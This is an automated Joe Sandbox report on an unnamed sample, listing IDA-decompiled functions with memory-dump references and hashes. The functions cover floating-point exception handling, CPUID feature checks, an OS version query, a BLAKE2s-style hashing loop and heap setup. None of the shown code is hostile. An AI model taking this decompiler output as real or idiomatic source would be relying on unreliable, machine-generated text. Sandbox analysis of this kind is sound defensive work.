                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorFormatLastMessage
                • String ID:
                • API String ID: 3479602957-0
                • Opcode ID: 8706e587f2b489c075fe9a3c4ae9b9b21a09960fc036b9417417523bdfea3fdb
                • Instruction ID: 77191b280499da0ffe89810af545f4844b38c573b8a77bbbde5bf4c1ae539a0e
                • Opcode Fuzzy Hash: 8706e587f2b489c075fe9a3c4ae9b9b21a09960fc036b9417417523bdfea3fdb
                • Instruction Fuzzy Hash: 19D0C932385300BFFA120F619E07F2A7F9DBF45B56F18C415B7A5E90E0CA749424A629
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004019F4(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                				signed int _t172;
                				signed int _t175;
                				signed int _t178;
                				signed int* _t179;
                				signed int _t195;
                				signed int _t199;
                				signed int _t202;
                				void* _t203;
                				void* _t206;
                				signed int _t209;
                				void* _t210;
                				signed int _t225;
                				unsigned int* _t240;
                				signed char _t242;
                				signed int* _t250;
                				unsigned int* _t256;
                				signed int* _t257;
                				signed char _t259;
                				long _t262;
                				signed int* _t265;
                
                				 *(_a4 + 4) = 0;
                				_t262 = 0xc000000d;
                				 *(_a4 + 8) = 0;
                				 *(_a4 + 0xc) = 0;
                				_t242 = _a12;
                				if((_t242 & 0x00000010) != 0) {
                					_t262 = 0xc000008f;
                					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                				}
                				if((_t242 & 0x00000002) != 0) {
                					_t262 = 0xc0000093;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                				}
                				if((_t242 & 0x00000001) != 0) {
                					_t262 = 0xc0000091;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                				}
                				if((_t242 & 0x00000004) != 0) {
                					_t262 = 0xc000008e;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                				}
                				if((_t242 & 0x00000008) != 0) {
                					_t262 = 0xc0000090;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                				}
                				_t265 = _a8;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                				_t259 = E003FF352(_a4);
                				if((_t259 & 0x00000001) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                				}
                				if((_t259 & 0x00000004) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                				}
                				if((_t259 & 0x00000008) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                				}
                				if((_t259 & 0x00000010) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                				}
                				if((_t259 & 0x00000020) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                				}
                				_t172 =  *_t265 & 0x00000c00;
                				if(_t172 == 0) {
                					 *_a4 =  *_a4 & 0xfffffffc;
                				} else {
                					if(_t172 == 0x400) {
                						_t257 = _a4;
                						_t225 =  *_t257 & 0xfffffffd | 1;
                						L26:
                						 *_t257 = _t225;
                						L29:
                						_t175 =  *_t265 & 0x00000300;
                						if(_t175 == 0) {
                							_t250 = _a4;
                							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                							L35:
                							 *_t250 = _t178;
                							L36:
                							_t179 = _a4;
                							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                							if(_a28 == 0) {
                								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                								 *((long long*)(_a4 + 0x10)) =  *_a20;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                								_t254 = _a4;
                								_t240 = _a24;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                								 *(_a4 + 0x50) =  *_t240;
                							} else {
                								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                								_t240 = _a24;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                								 *(_a4 + 0x50) =  *_t240;
                							}
                							E003FF2B8(_t254);
                							RaiseException(_t262, 0, 1,  &_a4);
                							_t256 = _a4;
                							if((_t256[2] & 0x00000010) != 0) {
                								 *_t265 =  *_t265 & 0xfffffffe;
                							}
                							if((_t256[2] & 0x00000008) != 0) {
                								 *_t265 =  *_t265 & 0xfffffffb;
                							}
                							if((_t256[2] & 0x00000004) != 0) {
                								 *_t265 =  *_t265 & 0xfffffff7;
                							}
                							if((_t256[2] & 0x00000002) != 0) {
                								 *_t265 =  *_t265 & 0xffffffef;
                							}
                							if((_t256[2] & 0x00000001) != 0) {
                								 *_t265 =  *_t265 & 0xffffffdf;
                							}
                							_t195 =  *_t256 & 0x00000003;
                							if(_t195 == 0) {
                								 *_t265 =  *_t265 & 0xfffff3ff;
                							} else {
                								_t206 = _t195 - 1;
                								if(_t206 == 0) {
                									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                									L55:
                									 *_t265 = _t209;
                									L58:
                									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                									if(_t199 == 0) {
                										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                										L64:
                										 *_t265 = _t202;
                										L65:
                										if(_a28 == 0) {
                											 *_t240 = _t256[0x14];
                										} else {
                											 *_t240 = _t256[0x14];
                										}
                										return _t202;
                									}
                									_t203 = _t199 - 1;
                									if(_t203 == 0) {
                										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                										goto L64;
                									}
                									_t202 = _t203 - 1;
                									if(_t202 == 0) {
                										 *_t265 =  *_t265 & 0xfffff3ff;
                									}
                									goto L65;
                								}
                								_t210 = _t206 - 1;
                								if(_t210 == 0) {
                									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                									goto L55;
                								}
                								if(_t210 == 1) {
                									 *_t265 =  *_t265 | 0x00000c00;
                								}
                							}
                							goto L58;
                						}
                						if(_t175 == 0x200) {
                							_t250 = _a4;
                							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                							goto L35;
                						}
                						if(_t175 == 0x300) {
                							 *_a4 =  *_a4 & 0xffffffe3;
                						}
                						goto L36;
                					}
                					if(_t172 == 0x800) {
                						_t257 = _a4;
                						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                						goto L26;
                					}
                					if(_t172 == 0xc00) {
                						 *_a4 =  *_a4 | 0x00000003;
                					}
                				}
                			}























                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004019EF,?,?,00000008,?,?,0040168F,00000000), ref: 00401C21
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: 2e90e538f93babccff5632c8345fbba9dd9e06e0ee43ad294cbcd5de9a16e334
                • Instruction ID: 58e215a93b5425a6fa69384bec7ef421f7593cb0c8bd455516af5cd1725b93f5
                • Opcode Fuzzy Hash: 2e90e538f93babccff5632c8345fbba9dd9e06e0ee43ad294cbcd5de9a16e334
                • Instruction Fuzzy Hash: 11B13B352106089FE715CF28C48AB657BE0FF45364F258669E89ADF3E1C339E992CB44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E003EF654(signed int __edx) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _v40;
                				intOrPtr _t60;
                				signed int _t61;
                				signed int _t62;
                				signed int _t63;
                				signed int _t66;
                				signed int _t67;
                				signed int _t73;
                				intOrPtr _t74;
                				intOrPtr _t75;
                				intOrPtr* _t77;
                				signed int _t78;
                				intOrPtr* _t82;
                				signed int _t85;
                				signed int _t90;
                				intOrPtr* _t93;
                				signed int _t96;
                				signed int _t104;
                
                				_t90 = __edx;
                				 *0x431d20 =  *0x431d20 & 0x00000000;
                				 *0x40e7a0 =  *0x40e7a0 | 0x00000001;
                				if(IsProcessorFeaturePresent(0xa) == 0) {
                					L23:
                					return 0;
                				}
                				_v20 = _v20 & 0x00000000;
                				_push(_t74);
                				_t93 =  &_v40;
                				asm("cpuid");
                				_t75 = _t74;
                				 *_t93 = 0;
                				 *((intOrPtr*)(_t93 + 4)) = _t74;
                				 *((intOrPtr*)(_t93 + 8)) = 0;
                				 *(_t93 + 0xc) = _t90;
                				_v16 = _v40;
                				_v8 = _v28 ^ 0x49656e69;
                				_v12 = _v32 ^ 0x6c65746e;
                				_push(_t75);
                				asm("cpuid");
                				_t77 =  &_v40;
                				 *_t77 = 1;
                				 *((intOrPtr*)(_t77 + 4)) = _t75;
                				 *((intOrPtr*)(_t77 + 8)) = 0;
                				 *(_t77 + 0xc) = _t90;
                				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
                					L9:
                					_t96 =  *0x431d24;
                					L10:
                					_t85 = _v32;
                					_t60 = 7;
                					_v8 = _t85;
                					if(_v16 < _t60) {
                						_t78 = _v20;
                					} else {
                						_push(_t77);
                						asm("cpuid");
                						_t82 =  &_v40;
                						 *_t82 = _t60;
                						 *((intOrPtr*)(_t82 + 4)) = _t77;
                						 *((intOrPtr*)(_t82 + 8)) = 0;
                						_t85 = _v8;
                						 *(_t82 + 0xc) = _t90;
                						_t78 = _v36;
                						if((_t78 & 0x00000200) != 0) {
                							 *0x431d24 = _t96 | 0x00000002;
                						}
                					}
                					_t61 =  *0x40e7a0; // 0x6f
                					_t62 = _t61 | 0x00000002;
                					 *0x431d20 = 1;
                					 *0x40e7a0 = _t62;
                					if((_t85 & 0x00100000) != 0) {
                						_t63 = _t62 | 0x00000004;
                						 *0x431d20 = 2;
                						 *0x40e7a0 = _t63;
                						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
                							asm("xgetbv");
                							_v24 = _t63;
                							_v20 = _t90;
                							_t104 = 6;
                							if((_v24 & _t104) == _t104) {
                								_t66 =  *0x40e7a0; // 0x6f
                								_t67 = _t66 | 0x00000008;
                								 *0x431d20 = 3;
                								 *0x40e7a0 = _t67;
                								if((_t78 & 0x00000020) != 0) {
                									 *0x431d20 = 5;
                									 *0x40e7a0 = _t67 | 0x00000020;
                									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
                										 *0x40e7a0 =  *0x40e7a0 | 0x00000040;
                										 *0x431d20 = _t104;
                									}
                								}
                							}
                						}
                					}
                					goto L23;
                				}
                				_t73 = _v40 & 0x0fff3ff0;
                				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
                					_t96 =  *0x431d24 | 0x00000001;
                					 *0x431d24 = _t96;
                					goto L10;
                				} else {
                					goto L9;
                				}
                			}


                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 003EF66A
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FeaturePresentProcessor
                • String ID:
                • API String ID: 2325560087-0
                • Opcode ID: 261726037aed3a08b8db42120a2b6cc37c225ced35f51869fc4b278444b987ef
                • Instruction ID: d297c08469350fc14253dd0c197a85e6d38ebd472d2d6d284b3acb14ab9de70e
                • Opcode Fuzzy Hash: 261726037aed3a08b8db42120a2b6cc37c225ced35f51869fc4b278444b987ef
                • Instruction Fuzzy Hash: 455192B1A006598FEB15CF56E9817AABBF4FB48354F258A39D401EB2A0D3B4E901CB54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003DB146() {
                				struct _OSVERSIONINFOW _v280;
                				signed int _t6;
                				intOrPtr _t12;
                				intOrPtr _t13;
                
                				_t12 =  *0x40e020; // 0x2
                				if(_t12 != 0xffffffff) {
                					_t6 =  *0x4110a8;
                					_t13 =  *0x4110ac;
                				} else {
                					_v280.dwOSVersionInfoSize = 0x114;
                					GetVersionExW( &_v280);
                					_t12 = _v280.dwPlatformId;
                					_t6 = _v280.dwMajorVersion;
                					_t13 = _v280.dwMinorVersion;
                					 *0x40e020 = _t12;
                					 *0x4110a8 = _t6;
                					 *0x4110ac = _t13;
                				}
                				if(_t12 != 2) {
                					return 0x501;
                				} else {
                					return (_t6 << 8) + _t13;
                				}
                			}


                APIs
                • GetVersionExW.KERNEL32(?), ref: 003DB16B
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Version
                • String ID:
                • API String ID: 1889659487-0
                • Opcode ID: ad36e2d0fde60ba2fa25c1ce9460d93accd6c6b977cedfefb5132c82f4e6c088
                • Instruction ID: 13beac119f0f667f30dde84ed6ca9e3bbf0bb279a3bd03d0d72b0d1a0dc7618d
                • Opcode Fuzzy Hash: ad36e2d0fde60ba2fa25c1ce9460d93accd6c6b977cedfefb5132c82f4e6c088
                • Instruction Fuzzy Hash: 16F030B5D00218CFDB18CB18FD916D977F5F748315F1146AAD619937A0C370AA818E64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E003D40FE() {
                				signed int* _t187;
                				void* _t190;
                				signed int _t200;
                				signed int _t201;
                				signed int _t202;
                				signed int _t208;
                				signed int _t209;
                				signed int _t210;
                				signed int _t216;
                				signed int _t217;
                				signed int _t224;
                				signed int _t232;
                				signed int _t233;
                				signed int _t234;
                				signed int _t239;
                				signed int _t240;
                				signed int _t245;
                				signed int _t246;
                				signed int _t253;
                				signed int _t254;
                				signed int _t256;
                				signed int _t258;
                				intOrPtr _t259;
                				signed int _t260;
                				signed int _t262;
                				signed int _t263;
                				signed int _t265;
                				signed int _t266;
                				signed int _t272;
                				signed int _t274;
                				signed int _t276;
                				signed int _t278;
                				signed int _t280;
                				signed int _t283;
                				signed int _t286;
                				signed int _t289;
                				signed int _t292;
                				intOrPtr _t295;
                				signed int _t297;
                				signed int _t299;
                				signed int _t301;
                				signed int _t303;
                				signed int _t305;
                				signed int _t306;
                				signed int _t308;
                				signed int _t310;
                				void* _t311;
                				signed int _t320;
                				signed int _t323;
                				signed int _t326;
                				signed int _t328;
                				intOrPtr _t329;
                				signed int _t331;
                				signed int _t332;
                				intOrPtr _t335;
                				signed int _t337;
                				signed int _t339;
                				signed int _t342;
                				signed int _t344;
                				signed int _t345;
                				signed int _t347;
                				signed int _t348;
                				intOrPtr _t349;
                				intOrPtr _t350;
                				signed int _t352;
                				signed int _t353;
                				signed int _t354;
                				intOrPtr _t355;
                				signed int _t356;
                				signed int _t358;
                				signed int _t359;
                				signed int _t361;
                				void* _t362;
                				void* _t363;
                				void* _t364;
                
                				_t295 =  *((intOrPtr*)(_t362 + 0xd0));
                				_t187 =  *(_t295 + 0xf8);
                				_t258 =  *_t187 ^ 0x510e527f;
                				_t352 = _t187[1] ^ 0x9b05688c;
                				_t266 = 0x10;
                				memcpy(_t362 + 0xa0,  *(_t362 + 0xe0), _t266 << 2);
                				_t363 = _t362 + 0xc;
                				_push(8);
                				_t190 = memcpy(_t363 + 0x5c,  *(_t295 + 0xf4), 0 << 2);
                				_t364 = _t363 + 0xc;
                				 *(_t364 + 0x20) =  *_t190 ^ 0x1f83d9ab;
                				_t272 =  *(_t364 + 0x6c);
                				_t335 = 0;
                				 *(_t364 + 0x28) =  *(_t190 + 4) ^ 0x5be0cd19;
                				 *(_t364 + 0x1c) =  *(_t364 + 0x78);
                				 *(_t364 + 0x38) =  *(_t364 + 0x74);
                				 *(_t364 + 0x18) = 0x6a09e667;
                				 *(_t364 + 0x24) = 0xbb67ae85;
                				 *(_t364 + 0x2c) = 0x3c6ef372;
                				 *(_t364 + 0x34) = 0xa54ff53a;
                				 *((intOrPtr*)(_t364 + 0x14)) = 0;
                				 *(_t364 + 0x30) =  *(_t364 + 0x70);
                				 *(_t364 + 0x10) = _t272;
                				do {
                					_t27 = _t335 + 0x4036c0; // 0x3020100
                					_t31 = _t364 + 0x18; // 0x6a09e667
                					_t320 =  *((intOrPtr*)(_t364 + 0x9c + ( *_t27 & 0x000000ff) * 4)) + _t272 +  *(_t364 + 0x5c);
                					_t297 = _t320 ^ _t258;
                					_t259 =  *((intOrPtr*)(_t364 + 0x14));
                					asm("rol edx, 0x10");
                					_t274 =  *_t31 + _t297;
                					_t337 = _t274 ^  *(_t364 + 0x10);
                					asm("ror esi, 0xc");
                					_t200 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0x4036c1) & 0x000000ff) * 4)) + _t337 + _t320;
                					 *(_t364 + 0x18) = _t200;
                					_t201 = _t200 ^ _t297;
                					asm("ror eax, 0x8");
                					 *(_t364 + 0x3c) = _t201;
                					_t202 = _t201 + _t274;
                					 *(_t364 + 0x48) = _t202;
                					asm("ror eax, 0x7");
                					 *(_t364 + 0x50) = _t202 ^ _t337;
                					_t323 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0x4036c2) & 0x000000ff) * 4)) +  *(_t364 + 0x30) +  *(_t364 + 0x60);
                					_t299 = _t323 ^ _t352;
                					_t353 =  *(_t364 + 0x38);
                					asm("rol edx, 0x10");
                					_t276 =  *(_t364 + 0x24) + _t299;
                					_t339 = _t276 ^  *(_t364 + 0x30);
                					asm("ror esi, 0xc");
                					_t208 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0x4036c3) & 0x000000ff) * 4)) + _t339 + _t323;
                					 *(_t364 + 0x10) = _t208;
                					_t209 = _t208 ^ _t299;
                					asm("ror eax, 0x8");
                					 *(_t364 + 0x44) = _t209;
                					_t210 = _t209 + _t276;
                					 *(_t364 + 0x58) = _t210;
                					asm("ror eax, 0x7");
                					 *(_t364 + 0x24) = _t210 ^ _t339;
                					_t342 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0x4036c4) & 0x000000ff) * 4)) + _t353 +  *(_t364 + 0x64);
                					_t301 = _t342 ^  *(_t364 + 0x20);
                					asm("rol edx, 0x10");
                					_t278 =  *(_t364 + 0x2c) + _t301;
                					_t354 = _t353 ^ _t278;
                					asm("ror ebp, 0xc");
                					_t216 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0x4036c5) & 0x000000ff) * 4)) + _t354 + _t342;
                					 *(_t364 + 0x40) = _t216;
                					_t217 = _t216 ^ _t301;
                					asm("ror eax, 0x8");
                					 *(_t364 + 0x54) = _t217;
                					_t260 = _t217 + _t278;
                					_t355 =  *((intOrPtr*)(_t364 + 0x14));
                					asm("ror eax, 0x7");
                					 *(_t364 + 0x20) = _t260 ^ _t354;
                					_t326 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t355 + 0x4036c6) & 0x000000ff) * 4)) +  *(_t364 + 0x1c) +  *(_t364 + 0x68);
                					_t303 = _t326 ^  *(_t364 + 0x28);
                					asm("rol edx, 0x10");
                					_t280 =  *(_t364 + 0x34) + _t303;
                					_t344 = _t280 ^  *(_t364 + 0x1c);
                					asm("ror esi, 0xc");
                					_t224 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t355 + 0x4036c7) & 0x000000ff) * 4)) + _t344 + _t326;
                					 *(_t364 + 0x4c) = _t224;
                					_t328 = _t224 ^ _t303;
                					asm("ror edi, 0x8");
                					_t356 = _t328 + _t280;
                					asm("ror eax, 0x7");
                					 *(_t364 + 0x1c) = _t356 ^ _t344;
                					_t98 = _t364 + 0x18; // 0x6a09e667
                					_t283 =  *((intOrPtr*)(_t364 + 0x9c + ( *( *((intOrPtr*)(_t364 + 0x14)) + 0x4036c8) & 0x000000ff) * 4)) +  *(_t364 + 0x24) +  *_t98;
                					_t305 = _t283 ^ _t328;
                					_t329 =  *((intOrPtr*)(_t364 + 0x14));
                					asm("rol edx, 0x10");
                					_t345 = _t305 + _t260;
                					_t262 = _t345 ^  *(_t364 + 0x24);
                					asm("ror ebx, 0xc");
                					_t232 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0x4036c9) & 0x000000ff) * 4)) + _t262 + _t283;
                					 *(_t364 + 0x5c) = _t232;
                					_t233 = _t232 ^ _t305;
                					asm("ror eax, 0x8");
                					 *(_t364 + 0x28) = _t233;
                					 *(_t364 + 0x98) = _t233;
                					_t234 = _t233 + _t345;
                					_t263 = _t262 ^ _t234;
                					 *(_t364 + 0x2c) = _t234;
                					 *(_t364 + 0x84) = _t234;
                					asm("ror ebx, 0x7");
                					 *(_t364 + 0x30) = _t263;
                					 *(_t364 + 0x70) = _t263;
                					_t286 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0x4036ca) & 0x000000ff) * 4)) +  *(_t364 + 0x20) +  *(_t364 + 0x10);
                					_t265 = _t286 ^  *(_t364 + 0x3c);
                					asm("rol ebx, 0x10");
                					_t306 = _t265 + _t356;
                					_t358 = _t306 ^  *(_t364 + 0x20);
                					asm("ror ebp, 0xc");
                					_t239 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0x4036cb) & 0x000000ff) * 4)) + _t358 + _t286;
                					_t258 = _t265 ^ _t239;
                					 *(_t364 + 0x60) = _t239;
                					asm("ror ebx, 0x8");
                					_t240 = _t306 + _t258;
                					_t359 = _t358 ^ _t240;
                					 *(_t364 + 0x34) = _t240;
                					 *(_t364 + 0x88) = _t240;
                					asm("ror ebp, 0x7");
                					 *(_t364 + 0x38) = _t359;
                					 *(_t364 + 0x74) = _t359;
                					_t289 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0x4036cc) & 0x000000ff) * 4)) +  *(_t364 + 0x1c) +  *(_t364 + 0x40);
                					_t361 = _t289 ^  *(_t364 + 0x44);
                					asm("rol ebp, 0x10");
                					_t308 =  *(_t364 + 0x48) + _t361;
                					_t347 = _t308 ^  *(_t364 + 0x1c);
                					asm("ror esi, 0xc");
                					_t245 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0x4036cd) & 0x000000ff) * 4)) + _t347 + _t289;
                					_t352 = _t361 ^ _t245;
                					 *(_t364 + 0x64) = _t245;
                					asm("ror ebp, 0x8");
                					_t246 = _t308 + _t352;
                					_t348 = _t347 ^ _t246;
                					 *(_t364 + 0x18) = _t246;
                					 *(_t364 + 0x7c) = _t246;
                					asm("ror esi, 0x7");
                					 *(_t364 + 0x1c) = _t348;
                					 *(_t364 + 0x78) = _t348;
                					_t292 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0x4036ce) & 0x000000ff) * 4)) +  *(_t364 + 0x4c) +  *(_t364 + 0x50);
                					_t349 =  *((intOrPtr*)(_t364 + 0x14));
                					_t331 = _t292 ^  *(_t364 + 0x54);
                					asm("rol edi, 0x10");
                					_t310 =  *(_t364 + 0x58) + _t331;
                					asm("ror eax, 0xc");
                					 *(_t364 + 0x10) = _t310 ^  *(_t364 + 0x50);
                					_t335 = _t349 + 0x10;
                					 *((intOrPtr*)(_t364 + 0x14)) = _t335;
                					_t253 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t349 + 0x4036cf) & 0x000000ff) * 4)) +  *(_t364 + 0x10) + _t292;
                					_t332 = _t331 ^ _t253;
                					 *(_t364 + 0x68) = _t253;
                					asm("ror edi, 0x8");
                					 *(_t364 + 0x20) = _t332;
                					 *(_t364 + 0x94) = _t332;
                					_t254 = _t310 + _t332;
                					_t272 =  *(_t364 + 0x10) ^ _t254;
                					 *(_t364 + 0x24) = _t254;
                					asm("ror ecx, 0x7");
                					 *(_t364 + 0x80) = _t254;
                					 *(_t364 + 0x10) = _t272;
                					 *(_t364 + 0x6c) = _t272;
                				} while (_t335 <= 0x90);
                				_t350 =  *((intOrPtr*)(_t364 + 0xe0));
                				_t311 = 0;
                				 *(_t364 + 0x8c) = _t258;
                				 *(_t364 + 0x90) = _t352;
                				do {
                					_t256 =  *(_t364 + _t311 + 0x7c) ^  *(_t364 + _t311 + 0x5c);
                					 *(_t311 +  *((intOrPtr*)(_t350 + 0xf4))) =  *(_t311 +  *((intOrPtr*)(_t350 + 0xf4))) ^ _t256;
                					_t311 = _t311 + 4;
                				} while (_t311 < 0x20);
                				return _t256;
                			}


                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID: gj
                • API String ID: 0-4203073231
                • Opcode ID: e72a2651f19d07703c7d7f38edc6707504da41a9900ca1f7544a0d3306fcc064
                • Instruction ID: fc072107fd01c9f00fd597482ba70c20de6e413f73cd47a05abe6492087cd53c
                • Opcode Fuzzy Hash: e72a2651f19d07703c7d7f38edc6707504da41a9900ca1f7544a0d3306fcc064
                • Instruction Fuzzy Hash: B9C14772A183418FC354CF29D88065AFBE1BFC8708F19892EE998E7311D734E955CB96
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003FC030() {
                				signed int _t3;
                
                				_t3 = GetProcessHeap();
                				 *0x4326e4 = _t3;
                				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                			}

                0x003fc030
                0x003fc038
                0x003fc040

                APIs
                Memory Dump Source
